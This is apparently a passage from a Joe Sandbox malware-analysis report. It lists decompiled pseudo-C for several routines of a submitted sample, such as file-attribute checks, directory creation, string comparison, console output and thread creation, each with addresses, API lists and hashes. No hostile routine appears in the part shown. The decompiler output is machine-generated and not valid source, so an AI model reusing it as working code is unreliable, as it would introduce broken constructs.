                                                                                                    Function 003B5AE6 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B5AE6(WCHAR* __ecx, void* __eflags) {
				void* __esi;
				signed char _t40;
				long _t41;
				long _t44;
				signed int _t49;
				void* _t51;
				signed int _t55;
				intOrPtr* _t63;
				signed int _t71;
				signed int _t72;
				void* _t74;
				WCHAR* _t77;
				signed int _t78;
				void* _t80;

				E0041F1B0(E00422E1C, _t80);
				_t77 = __ecx; // executed
				_t40 = E003B68E0(__ecx); // executed
				if(_t40 == 0xffffffff || (_t40 & 0x00000010) == 0) {
					_t41 = E003B8553(_t77, __eflags);
					__eflags = _t41;
					if(_t41 == 0) {
						_t74 = E003B85E1(_t77, _t77);
						E003B2D8A(_t80 - 0x18, _t77);
						_t55 = 0;
						 *((intOrPtr*)(_t80 - 4)) = 0;
						_t44 = E003B325D(_t80 - 0x18);
						__eflags = _t44;
						if(__eflags < 0) {
							L10:
							E003B2E5F(_t80 - 0x24, __eflags, _t80 - 0x18);
							_t78 =  *(_t80 - 0x14);
							 *((char*)(_t80 - 4)) = 1;
							while(1) {
								L11:
								_t63 =  *((intOrPtr*)(_t80 - 0x18));
								while(1) {
									_t47 = E003B5C27(_t63); // executed
									__eflags = _t47;
									if(_t47 != 0) {
										goto L22;
									}
									_t47 = GetLastError();
									__eflags = _t47 - 0xb7;
									if(_t47 != 0xb7) {
										_t78 = E003B325D(_t80 - 0x18);
										__eflags = _t78 - _t55;
										if(__eflags >= 0 && __eflags != 0) {
											_t63 =  *((intOrPtr*)(_t80 - 0x18));
											__eflags = _t78 - 1;
											if(_t78 != 1) {
												L19:
												_t19 = _t78 + 1; // 0x1
												_t47 = _t19;
												__eflags = _t74 - _t19;
												if(_t74 < _t19) {
													__eflags = _t78 -  *(_t80 - 0x14);
													if(_t78 >=  *(_t80 - 0x14)) {
														continue;
													} else {
														 *(_t80 - 0x14) = _t78;
														 *(_t63 + _t78 * 2) = _t55;
														goto L11;
													}
													goto L30;
												}
											} else {
												_t47 =  *_t63;
												__eflags = _t47 - 0x5c;
												if(_t47 != 0x5c) {
													__eflags = _t47 - 0x2f;
													if(_t47 != 0x2f) {
														goto L19;
													}
												}
											}
										}
									}
									L29:
									_t44 = E003B1E40(_t47,  *((intOrPtr*)(_t80 - 0x24)));
									goto L30;
								}
								while(1) {
									L22:
									__eflags = _t78 -  *(_t80 - 0x20);
									if(_t78 >=  *(_t80 - 0x20)) {
										break;
									}
									_t51 = E003B824E( *((intOrPtr*)(_t80 - 0x24)) + 2 + _t78 * 2);
									__eflags = _t51 - _t55;
									if(_t51 >= _t55) {
										_t78 = _t78 + _t51 + 1;
									} else {
										_t78 =  *(_t80 - 0x20);
									}
									E003B2F87(_t80 - 0x18,  *((intOrPtr*)(_t80 - 0x24)), _t78);
									_t47 = L003B5A50( *((intOrPtr*)(_t80 - 0x18)));
									__eflags = _t47;
									if(_t47 != 0) {
										continue;
									} else {
									}
									goto L29;
								}
								_t55 = 1;
								goto L29;
							}
						} else {
							_t72 =  *(_t80 - 0x14);
							_t71 = _t72 - 1;
							__eflags = _t44 - _t71;
							if(__eflags != 0) {
								goto L10;
							} else {
								__eflags = _t72 - 1;
								if(__eflags != 0) {
									 *(_t80 - 0x14) = _t71;
									 *((short*)( *((intOrPtr*)(_t80 - 0x18)) + _t71 * 2)) = 0;
									goto L10;
								} else {
									_t55 = _t72;
								}
							}
						}
						L30:
						E003B1E40(_t44,  *((intOrPtr*)(_t80 - 0x18)));
						_t49 = _t55;
					} else {
						_t49 = 0;
					}
				} else {
					_t49 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t49;
			}

















                                                                                                    0x003b5aeb
                                                                                                    0x003b5af4
                                                                                                    0x003b5af6
                                                                                                    0x003b5afe
                                                                                                    0x003b5b0d
                                                                                                    0x003b5b12
                                                                                                    0x003b5b14
                                                                                                    0x003b5b29
                                                                                                    0x003b5b2c
                                                                                                    0x003b5b31
                                                                                                    0x003b5b36
                                                                                                    0x003b5b39
                                                                                                    0x003b5b3e
                                                                                                    0x003b5b40
                                                                                                    0x003b5b62
                                                                                                    0x003b5b69
                                                                                                    0x003b5b6e
                                                                                                    0x003b5b71
                                                                                                    0x003b5b75
                                                                                                    0x003b5b75
                                                                                                    0x003b5b75
                                                                                                    0x003b5b78
                                                                                                    0x003b5b78
                                                                                                    0x003b5b7d
                                                                                                    0x003b5b7f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b5b81
                                                                                                    0x003b5b87
                                                                                                    0x003b5b8c
                                                                                                    0x003b5b96
                                                                                                    0x003b5b98
                                                                                                    0x003b5b9a
                                                                                                    0x003b5b9e
                                                                                                    0x003b5ba1
                                                                                                    0x003b5ba4
                                                                                                    0x003b5bb5
                                                                                                    0x003b5bb5
                                                                                                    0x003b5bb5
                                                                                                    0x003b5bb8
                                                                                                    0x003b5bba
                                                                                                    0x003b5bbc
                                                                                                    0x003b5bbf
                                                                                                    0x00000000
                                                                                                    0x003b5bc1
                                                                                                    0x003b5bc1
                                                                                                    0x003b5bc4
                                                                                                    0x00000000
                                                                                                    0x003b5bc4
                                                                                                    0x00000000
                                                                                                    0x003b5bbf
                                                                                                    0x003b5ba6
                                                                                                    0x003b5ba6
                                                                                                    0x003b5ba9
                                                                                                    0x003b5bad
                                                                                                    0x003b5baf
                                                                                                    0x003b5bb3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b5bb3
                                                                                                    0x003b5bad
                                                                                                    0x003b5ba4
                                                                                                    0x003b5b9a
                                                                                                    0x003b5c04
                                                                                                    0x003b5c07
                                                                                                    0x00000000
                                                                                                    0x003b5c0c
                                                                                                    0x003b5bca
                                                                                                    0x003b5bca
                                                                                                    0x003b5bca
                                                                                                    0x003b5bcd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b5bd6
                                                                                                    0x003b5bdb
                                                                                                    0x003b5bdd
                                                                                                    0x003b5be4
                                                                                                    0x003b5bdf
                                                                                                    0x003b5bdf
                                                                                                    0x003b5bdf
                                                                                                    0x003b5bef
                                                                                                    0x003b5bf7
                                                                                                    0x003b5bfc
                                                                                                    0x003b5bfe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b5c00
                                                                                                    0x00000000
                                                                                                    0x003b5bfe
                                                                                                    0x003b5c02
                                                                                                    0x00000000
                                                                                                    0x003b5c02
                                                                                                    0x003b5b42
                                                                                                    0x003b5b42
                                                                                                    0x003b5b45
                                                                                                    0x003b5b48
                                                                                                    0x003b5b4a
                                                                                                    0x00000000
                                                                                                    0x003b5b4c
                                                                                                    0x003b5b4c
                                                                                                    0x003b5b4f
                                                                                                    0x003b5b5b
                                                                                                    0x003b5b5e
                                                                                                    0x00000000
                                                                                                    0x003b5b51
                                                                                                    0x003b5b51
                                                                                                    0x003b5b51
                                                                                                    0x003b5b4f
                                                                                                    0x003b5b4a
                                                                                                    0x003b5c0d
                                                                                                    0x003b5c10
                                                                                                    0x003b5c16
                                                                                                    0x003b5b16
                                                                                                    0x003b5b16
                                                                                                    0x003b5b16
                                                                                                    0x003b5b04
                                                                                                    0x003b5b04
                                                                                                    0x003b5b04
                                                                                                    0x003b5c1e
                                                                                                    0x003b5c26

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B5AEB
                                                                                                      • Part of subcall function 003B68E0: __EH_prolog.LIBCMT ref: 003B68E5
                                                                                                      • Part of subcall function 003B68E0: GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 003B6905
                                                                                                      • Part of subcall function 003B68E0: GetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000,?), ref: 003B6934
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFileH_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3244726999-0
                                                                                                    • Opcode ID: ce1d94c1283894072145377ce3e0efbb844e2c7e24b0508fb3635a236cc17a24
                                                                                                    • Instruction ID: c817a539ec426ee0d78e1b061d1eac11940e41821e7c29369ca3bf3b763d830d
                                                                                                    • Opcode Fuzzy Hash: ce1d94c1283894072145377ce3e0efbb844e2c7e24b0508fb3635a236cc17a24
                                                                                                    • Instruction Fuzzy Hash: AB31B032900A058ACF17EF94C4816FEB776AF1130CF590469EB12BBA91DB215D46CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D66A9 Relevance: 3.1, APIs: 2, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 94%
                                                                                                    			E003D66A9(void* __ecx, void* __eflags) {
				void* __ebx;
				void* _t47;
				void* _t54;
				signed int _t59;
				char _t61;
				void* _t87;
				signed int _t89;
				void* _t91;

				E0041F1B0(E004250E0, _t91);
				 *((intOrPtr*)(_t91 - 0x18)) = 0;
				 *((intOrPtr*)(_t91 - 0x14)) = 0;
				 *((intOrPtr*)(_t91 - 0x10)) = 0;
				 *(_t91 - 4) = 0;
				 *((intOrPtr*)(_t91 - 0x24)) = 0;
				 *((intOrPtr*)(_t91 - 0x20)) = 0;
				 *((intOrPtr*)(_t91 - 0x1c)) = 0;
				 *(_t91 - 4) = 1;
				E003B355E( *((intOrPtr*)(_t91 + 8)), _t91 - 0x18, __eflags); // executed
				E003B355E( *((intOrPtr*)(_t91 + 0xc)), _t91 - 0x24, __eflags);
				_t89 = 0;
				if( *((intOrPtr*)(_t91 - 0x14)) <= 0) {
					L6:
					 *(_t91 - 4) = 0;
					E003D0A72(0, _t91 - 0x24);
					 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
					_t47 = E003D0A72(0, _t91 - 0x18);
					 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
					return _t47;
				}
				_t87 = __ecx + 0x1c;
				do {
					E003B2D47(_t91 - 0x3c);
					 *(_t91 - 4) = 2;
					E003B2D47(_t91 - 0x30);
					 *(_t91 - 4) = 3;
					E003B2F2F(_t91 - 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t91 - 0x18)) + _t89 * 4)));
					if(_t89 <  *((intOrPtr*)(_t91 - 0x20))) {
						E003B2F2F(_t91 - 0x30,  *((intOrPtr*)( *((intOrPtr*)(_t91 - 0x24)) + _t89 * 4)));
						_t59 = wcscmp( *(_t91 - 0x30), 0x429388);
						asm("sbb al, al");
						_t61 =  ~_t59 + 1;
						 *((char*)(_t91 + 0xb)) = _t61;
						if(_t61 != 0) {
							 *((intOrPtr*)(_t91 - 0x2c)) = 0;
							 *( *(_t91 - 0x30)) = 0;
						}
					}
					E003EF23F(_t87);
					_push(_t91 - 0x3c);
					_t54 = E003D65BE(0, _t87);
					 *(_t91 - 4) = 1;
					E003B1E40(E003B1E40(_t54,  *(_t91 - 0x30)),  *((intOrPtr*)(_t91 - 0x3c)));
					_t89 = _t89 + 1;
				} while (_t89 <  *((intOrPtr*)(_t91 - 0x14)));
				goto L6;
			}











                                                                                                    0x003d66ae
                                                                                                    0x003d66bd
                                                                                                    0x003d66c0
                                                                                                    0x003d66c3
                                                                                                    0x003d66c6
                                                                                                    0x003d66c9
                                                                                                    0x003d66cc
                                                                                                    0x003d66cf
                                                                                                    0x003d66d8
                                                                                                    0x003d66dc
                                                                                                    0x003d66e7
                                                                                                    0x003d66ec
                                                                                                    0x003d66f1
                                                                                                    0x003d6789
                                                                                                    0x003d678c
                                                                                                    0x003d678f
                                                                                                    0x003d6794
                                                                                                    0x003d679b
                                                                                                    0x003d67a6
                                                                                                    0x003d67ae
                                                                                                    0x003d67ae
                                                                                                    0x003d66f7
                                                                                                    0x003d66fa
                                                                                                    0x003d66fd
                                                                                                    0x003d6705
                                                                                                    0x003d6709
                                                                                                    0x003d6714
                                                                                                    0x003d671b
                                                                                                    0x003d6723
                                                                                                    0x003d672e
                                                                                                    0x003d673b
                                                                                                    0x003d6743
                                                                                                    0x003d6746
                                                                                                    0x003d6749
                                                                                                    0x003d674c
                                                                                                    0x003d6751
                                                                                                    0x003d6754
                                                                                                    0x003d6754
                                                                                                    0x003d674c
                                                                                                    0x003d6759
                                                                                                    0x003d6763
                                                                                                    0x003d6764
                                                                                                    0x003d676c
                                                                                                    0x003d6778
                                                                                                    0x003d677d
                                                                                                    0x003d6782
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003D66AE
                                                                                                      • Part of subcall function 003B355E: __EH_prolog.LIBCMT ref: 003B3563
                                                                                                    • wcscmp.MSVCRT ref: 003D673B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$wcscmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 3232955128-0
                                                                                                    • Opcode ID: 27454c1a5d7163966013c886b57d9579f817c3a164e4bafffe43b66c14381774
                                                                                                    • Instruction ID: 8c244827681f44aceaff699222d3cafebcc6b02503696e724483eedef1b2e49b
                                                                                                    • Opcode Fuzzy Hash: 27454c1a5d7163966013c886b57d9579f817c3a164e4bafffe43b66c14381774
                                                                                                    • Instruction Fuzzy Hash: AD316931D01259EECF06EFA9E482AEDFB71BF59308F50416EE425772A1CB305A05CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003FD39A Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 51%
                                                                                                    			E003FD39A(void* __ecx) {
				void* _t19;
				intOrPtr _t29;
				void* _t34;
				intOrPtr _t36;

				E0041F1B0(0x4279c4, _t34);
				_push(__ecx);
				_push(__ecx);
				_t29 =  *((intOrPtr*)(_t34 + 8));
				 *((intOrPtr*)(_t34 - 0x10)) = _t36;
				_push( *((intOrPtr*)(_t34 + 0x18)));
				 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
				_push( *((intOrPtr*)(_t34 + 0x14)));
				_push( *((intOrPtr*)(_t34 + 0x10)));
				_push( *((intOrPtr*)(_t34 + 0xc)));
				_push(_t29); // executed
				_t19 = E003FCF5C(__ecx); // executed
				if( *((char*)(__ecx + 0x3c)) != 0) {
					 *((char*)(_t29 + 0x14a)) = 1;
				}
				if(_t19 != 0x80004001) {
					 *[fs:0x0] =  *((intOrPtr*)(_t34 - 0xc));
					return _t19;
				} else {
					_push(0x438128);
					 *((char*)(_t34 - 0x11)) =  *((intOrPtr*)(_t34 + 0xb));
					_push(_t34 - 0x11);
					L0041F1D0();
					 *((char*)( *((intOrPtr*)(_t34 + 8)) + 0x14e)) = 1;
					return E003FD40F;
				}
			}







                                                                                                    0x003fd39f
                                                                                                    0x003fd3a4
                                                                                                    0x003fd3a5
                                                                                                    0x003fd3a9
                                                                                                    0x003fd3ac
                                                                                                    0x003fd3af
                                                                                                    0x003fd3b2
                                                                                                    0x003fd3b8
                                                                                                    0x003fd3bb
                                                                                                    0x003fd3be
                                                                                                    0x003fd3c1
                                                                                                    0x003fd3c2
                                                                                                    0x003fd3cb
                                                                                                    0x003fd3cd
                                                                                                    0x003fd3cd
                                                                                                    0x003fd3d9
                                                                                                    0x003fd417
                                                                                                    0x003fd420
                                                                                                    0x003fd3db
                                                                                                    0x003fd3de
                                                                                                    0x003fd3e3
                                                                                                    0x003fd3e9
                                                                                                    0x003fd3ea
                                                                                                    0x003fd3f2
                                                                                                    0x003fd3fe
                                                                                                    0x003fd3fe

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003FD39F
                                                                                                      • Part of subcall function 003FCF5C: __EH_prolog.LIBCMT ref: 003FCF61
                                                                                                    • _CxxThrowException.MSVCRT(?,00438128), ref: 003FD3EA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2366012087-0
                                                                                                    • Opcode ID: 8be8d49317b7311b9c1a70a7bea7f7c44efdf003c83dca80992c9e7a1772e997
                                                                                                    • Instruction ID: 349308519a19d991b5342785559fbdf4d38f2e05043662418a01d3ca7aece513
                                                                                                    • Opcode Fuzzy Hash: 8be8d49317b7311b9c1a70a7bea7f7c44efdf003c83dca80992c9e7a1772e997
                                                                                                    • Instruction Fuzzy Hash: E501F23250424DFEDF028F54C809BEE7FB4EF05310F04405AFA085B111C3B9A994CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E45B8 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003E45B8(void* __ecx) {
				void* _t12;
				void* _t27;
				void* _t30;

				_t12 = E0041F1B0(0x425fc4, _t30);
				_t27 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					E003B2690(_t30 - 0x18);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					E003E4435(_t30 - 0x18,  *((intOrPtr*)(_t30 + 8)));
					fputs( *(_t30 - 0x18),  *( *(_t27 + 4))); // executed
					_t12 = E003B1E40(E003B1FA0( *(_t27 + 4)),  *(_t30 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t12;
			}






                                                                                                    0x003e45bd
                                                                                                    0x003e45c6
                                                                                                    0x003e45cc
                                                                                                    0x003e45d1
                                                                                                    0x003e45d9
                                                                                                    0x003e45e0
                                                                                                    0x003e45ed
                                                                                                    0x003e45ff
                                                                                                    0x003e4604
                                                                                                    0x003e4609
                                                                                                    0x003e4611

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003E45BD
                                                                                                    • fputs.MSVCRT ref: 003E45ED
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prologfputcfputsfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 195749403-0
                                                                                                    • Opcode ID: 44553bf502f708e6290173aa789dd19edc7a6b844c811de19377059ca37cb512
                                                                                                    • Instruction ID: 6fdc752b517a4f6a687135e7308d5114aa2f34e92b6b14468158a382398e3dbd
                                                                                                    • Opcode Fuzzy Hash: 44553bf502f708e6290173aa789dd19edc7a6b844c811de19377059ca37cb512
                                                                                                    • Instruction Fuzzy Hash: C8F0BE32900114DBCB1AEF54E8067EEBBB0EF08704F40812AE501A64D0CF346955CB88
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EA3CD Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003EA3CD(struct _IO_FILE** __ecx, void* __edx) {
				void* _t1;
				void* _t4;
				struct _IO_FILE** _t13;

				_t13 = __ecx;
				_t4 = __edx;
				if(__ecx != 0) {
					fputs( *0x42d3d0,  *__ecx); // executed
					_t1 = E003B1FA0(_t13);
					if(_t4 != 0) {
						return fputs( *0x42d3d4,  *_t13);
					}
				}
				return _t1;
			}






                                                                                                    0x003ea3cf
                                                                                                    0x003ea3d4
                                                                                                    0x003ea3d6
                                                                                                    0x003ea3e6
                                                                                                    0x003ea3ec
                                                                                                    0x003ea3f3
                                                                                                    0x00000000
                                                                                                    0x003ea400
                                                                                                    0x003ea3f3
                                                                                                    0x003ea404

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$fputc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1185151155-0
                                                                                                    • Opcode ID: 31137cad1c8c897b29771f7d22ecffcb11ba309c0dafa76d3dbad1b8b66e3242
                                                                                                    • Instruction ID: af33cf5789dd3abeb94bac41714e5df27be6535c721d634bfc3de01c6e698d97
                                                                                                    • Opcode Fuzzy Hash: 31137cad1c8c897b29771f7d22ecffcb11ba309c0dafa76d3dbad1b8b66e3242
                                                                                                    • Instruction Fuzzy Hash: 7DE026337141201EDA2A170AFC418543396DBC4660325013BEA40C32E0DAA32C126FA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00417E80 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 55%
                                                                                                    			E00417E80(intOrPtr* __ecx, void* __edx, char _a4) {
				char* _t3;
				long _t4;

				_t3 =  &_a4;
				_push(_t3);
				_push(0);
				_push(_a4);
				_push(0);
				_push(0); // executed
				L0041F5AA(); // executed
				 *__ecx = _t3;
				if(_t3 == 0) {
					_t4 = GetLastError();
					if(_t4 == 0) {
						return 1;
					}
					return _t4;
				} else {
					return 0;
				}
			}





                                                                                                    0x00417e81
                                                                                                    0x00417e85
                                                                                                    0x00417e86
                                                                                                    0x00417e8e
                                                                                                    0x00417e90
                                                                                                    0x00417e92
                                                                                                    0x00417e94
                                                                                                    0x00417e9c
                                                                                                    0x00417ea1
                                                                                                    0x00417ea8
                                                                                                    0x00417eb0
                                                                                                    0x00000000
                                                                                                    0x00417eb2
                                                                                                    0x00417eb7
                                                                                                    0x00417ea3
                                                                                                    0x00417ea5
                                                                                                    0x00417ea5

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_beginthreadex
                                                                                                    • String ID:
                                                                                                    • API String ID: 4034172046-0
                                                                                                    • Opcode ID: 18ee8e3c5fe76ef53f0503df5891298fc4d85c487a154f3ab2b4215f9fe1d1b8
                                                                                                    • Instruction ID: 6ff3f71e8b826f4a28098877975ffe9a44cf4531253e5ac3c20b2b014c02250c
                                                                                                    • Opcode Fuzzy Hash: 18ee8e3c5fe76ef53f0503df5891298fc4d85c487a154f3ab2b4215f9fe1d1b8
                                                                                                    • Instruction Fuzzy Hash: D8E08CB22483026AF3109A608C01FA776E8DBA0B00F48447EBA48C6284E6608C80C3B9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B97C7 Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B97C7(DWORD* __ecx) {
				int _t4;

				_t4 = GetProcessAffinityMask(GetCurrentProcess(), __ecx,  &(__ecx[1])); // executed
				return _t4;
			}




                                                                                                    0x003b97d3
                                                                                                    0x003b97d9

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,003B97E8), ref: 003B97CC
                                                                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 003B97D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                                    • String ID:
                                                                                                    • API String ID: 1231390398-0
                                                                                                    • Opcode ID: fe0c7ce55ac5c34381886989232f200f2d5406407aedaf3fbceba82c8809aba7
                                                                                                    • Instruction ID: e93ba08688fe12607d9f867b2adac2a1e7cfffc63853a506b620da32acad6a52
                                                                                                    • Opcode Fuzzy Hash: fe0c7ce55ac5c34381886989232f200f2d5406407aedaf3fbceba82c8809aba7
                                                                                                    • Instruction Fuzzy Hash: D6B012B1500108BFCF209BB0DD0CD963B2CEE05301B404464F909C6020C736C847CB2C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003BAE68 Relevance: 2.7, APIs: 2, Instructions: 222COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 81%
                                                                                                    			E003BAE68(char _a4, signed int _a8, int _a12, signed int _a16) {
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int* _t84;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				signed int _t93;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				intOrPtr _t113;
				int _t114;
				signed int* _t117;
				signed int _t120;
				intOrPtr _t123;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				long _t132;
				intOrPtr _t134;
				signed int _t135;
				signed int _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				int _t151;
				intOrPtr _t152;
				char _t155;
				void* _t163;

				_t84 = _a16;
				if(_t84 != 0) {
					 *_t84 =  *_t84 & 0x00000000;
				}
				if(_a12 == 0) {
					L10:
					_t85 = 0;
					L59:
